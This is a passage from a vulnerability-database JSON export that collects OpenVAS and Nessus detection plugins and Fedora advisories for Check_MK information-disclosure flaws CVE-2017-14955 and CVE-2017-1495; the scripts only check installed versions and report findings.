write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:check_mk_project:check_mk\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140449\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-10-24 14:59:40 +0700 (Tue, 24 Oct 2017)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n\n script_cve_id(\"CVE-2017-14955\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Check_MK Information Disclosure Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_check_mk_web_detect.nasl\");\n script_mandatory_keys(\"check_mk/detected\");\n\n script_tag(name:\"summary\", value:\"Check_MK is prone to a race condition vulnerability which could lead to\ninformation disclosure.\");\n\n script_tag(name:\"insight\", value:\"Check_MK mishandles certain errors within the failed-login save feature\nbecause of a race condition, which allows remote attackers to obtain sensitive user information by reading a GUI\ncrash report.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"Check_MK before version 1.2.8p26.\");\n\n script_tag(name:\"solution\", value:\"Update to version 1.2.8p26 or later.\");\n\n script_xref(name:\"URL\", value:\"https://www.rcesecurity.com/2017/10/cve-2017-14955-win-a-race-against-check-mk-to-dump-all-your-login-data/\");\n script_xref(name:\"URL\", value:\"https://mathias-kettner.de/check_mk_werks.php?werk_id=5208&HTML=yes\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE, service: \"www\"))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_less(version: version, test_version: \"1.2.8p26\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"1.2.8p26\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14955", "CVE-2017-1495"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-10-25T00:00:00", "id": "OPENVAS:1361412562310873524", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873524", "type": "openvas", "title": "Fedora Update for check-mk FEDORA-2017-9f36da1aac", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_9f36da1aac_check-mk_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for check-mk FEDORA-2017-9f36da1aac\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873524\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-10-25 15:35:33 +0200 (Wed, 25 Oct 2017)\");\n script_cve_id(\"CVE-2017-1495\", \"CVE-2017-14955\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for check-mk FEDORA-2017-9f36da1aac\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'check-mk'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"check-mk on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-9f36da1aac\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/J5JPRECHO3O5OIZBOXUWLAN24INBEBQF\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"check-mk\", rpm:\"check-mk~1.2.8p26~1.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14955", "CVE-2017-1495"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-10-25T00:00:00", "id": "OPENVAS:1361412562310873525", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873525", "type": "openvas", "title": "Fedora Update for check-mk FEDORA-2017-6bbb922009", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_6bbb922009_check-mk_fc25.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for check-mk FEDORA-2017-6bbb922009\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873525\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-10-25 15:35:40 +0200 (Wed, 25 Oct 2017)\");\n script_cve_id(\"CVE-2017-1495\", \"CVE-2017-14955\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for check-mk FEDORA-2017-6bbb922009\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'check-mk'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"check-mk on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-6bbb922009\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2R56VKACGVCXUW7WCE5KYLFDIDETE5WE\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"check-mk\", rpm:\"check-mk~1.2.8p26~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1495", "CVE-2017-14955"], "description": "check-mk is a general purpose Nagios-plugin for retrieving data. It adopts a new approach for collecting data from operating systems and network compone nts. It obsoletes NRPE, check_by_ssh, NSClient, and check_snmp and it has many benefits, the most important are a significant reduction of CPU usage on the Nagios host and an automatic inventory of items to be checked on hosts. ", "modified": "2017-10-11T14:48:44", "published": "2017-10-11T14:48:44", "id": "FEDORA:681B26261E34", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: check-mk-1.2.8p26-1.fc27", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1495", "CVE-2017-14955"], "description": "check-mk is a general purpose Nagios-plugin for retrieving data. It adopts a new approach for collecting data from operating systems and network compone nts. It obsoletes NRPE, check_by_ssh, NSClient, and check_snmp and it has many benefits, the most important are a significant reduction of CPU usage on the Nagios host and an automatic inventory of items to be checked on hosts. ", "modified": "2017-10-23T18:52:14", "published": "2017-10-23T18:52:14", "id": "FEDORA:1582D60A2936", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: check-mk-1.2.8p26-1.fc26", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1495", "CVE-2017-14955"], "description": "check-mk is a general purpose Nagios-plugin for retrieving data. It adopts a new approach for collecting data from operating systems and network compone nts. It obsoletes NRPE, check_by_ssh, NSClient, and check_snmp and it has many benefits, the most important are a significant reduction of CPU usage on the Nagios host and an automatic inventory of items to be checked on hosts. ", "modified": "2017-10-23T22:52:46", "published": "2017-10-23T22:52:46", "id": "FEDORA:3EDF36095522", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: check-mk-1.2.8p26-1.fc25", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "nessus": [{"lastseen": "2021-01-07T10:11:38", "description": "Security fix for CVE-2017-1495\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 17, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2018-01-15T00:00:00", "title": "Fedora 27 : check-mk (2017-79b7fd1b4d)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14955", "CVE-2017-1495"], "modified": "2018-01-15T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:27", "p-cpe:/a:fedoraproject:fedora:check-mk"], "id": "FEDORA_2017-79B7FD1B4D.NASL", "href": "https://www.tenable.com/plugins/nessus/105908", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-79b7fd1b4d.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105908);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1495\", \"CVE-2017-14955\");\n script_xref(name:\"FEDORA\", value:\"2017-79b7fd1b4d\");\n\n script_name(english:\"Fedora 27 : check-mk (2017-79b7fd1b4d)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2017-1495\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-79b7fd1b4d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected check-mk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:check-mk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"check-mk-1.2.8p26-1.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"check-mk\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-07T10:11:30", "description": "Security fix for CVE-2017-1495\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 18, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-10-24T00:00:00", "title": "Fedora 25 : check-mk (2017-6bbb922009)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14955", "CVE-2017-1495"], "modified": "2017-10-24T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:check-mk", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2017-6BBB922009.NASL", "href": "https://www.tenable.com/plugins/nessus/104111", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-6bbb922009.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104111);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1495\", \"CVE-2017-14955\");\n script_xref(name:\"FEDORA\", value:\"2017-6bbb922009\");\n\n script_name(english:\"Fedora 25 : check-mk (2017-6bbb922009)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2017-1495\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-6bbb922009\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected check-mk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:check-mk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"check-mk-1.2.8p26-1.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"check-mk\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-07T10:12:36", "description": "Security fix for CVE-2017-1495\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 18, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-10-24T00:00:00", "title": "Fedora 26 : check-mk (2017-9f36da1aac)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14955", "CVE-2017-1495"], "modified": "2017-10-24T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:check-mk", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-9F36DA1AAC.NASL", "href": "https://www.tenable.com/plugins/nessus/104112", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-9f36da1aac.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104112);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1495\", \"CVE-2017-14955\");\n script_xref(name:\"FEDORA\", value:\"2017-9f36da1aac\");\n\n script_name(english:\"Fedora 26 : check-mk (2017-9f36da1aac)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2017-1495\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-9f36da1aac\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected check-mk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:check-mk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"check-mk-1.2.8p26-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"check-mk\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}]}
